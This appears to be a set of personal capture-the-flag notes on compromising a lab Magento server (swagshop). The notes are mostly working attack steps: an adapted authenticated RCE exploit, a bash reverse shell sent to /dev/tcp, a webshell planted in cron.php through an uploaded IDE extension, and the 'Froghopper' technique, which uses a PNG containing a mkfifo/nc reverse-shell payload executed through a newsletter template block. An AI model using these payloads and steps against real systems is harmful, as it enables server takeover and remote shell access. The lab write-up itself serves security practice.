-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...' ..from local.xml
-------------------
Errors:
ippsec used path to admin page to help:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami'
-------------------
Other bloggers updated:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password
-------------------
More errors, had to update: from 72 > 2y
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
/\
-------------------
python 37811.py http://$IP "whoami" ..error
python 37811.py http://$IP/index.php/admin/ "whoami" ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"
nc -nvlp 5555
whoami
www-data
Upload IDE
Requires Admin login
System > Magento Connect > Magento Connection Manager > Upload
---------------
http://$IP/index.php/admin/
Login with Admin
System > Magento Connect > Magento Connection Manager
Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
nload:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz
---------------
System > Filesystem > IDE
Edit "Cron.php"
Update it with an evil php webshell
Get your shell
http://10.x.x.x/cron.php
Submit a python reverse shell
nc -nvlp 4444
whoami
www-data
Froghopper Attack (RCE)
Requires Admin login
Upload an evil png with shellcode
Enable Symlinks
Edit Newsletter to call the payload
http://swagshop.htb/index.php/admin/
Login with Admin
-------------------
Create evil png
echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png
-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"
-------------------
Catalog > Manage
New Category > Manage Categories > Categories > Catalog
Thumbnail Image: Browse "shell.php.png"
http://10.x.x.x/media/catalog/category/shell.php.png ..confirm it worked!
-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type=’core/template’ template=’../../../../../../media/catalog/category/shell.php.png’}}
-------------------
Open template to execute the 'symlink' pointed to the evil-png
nc -nvlp 4444
whoami
www-data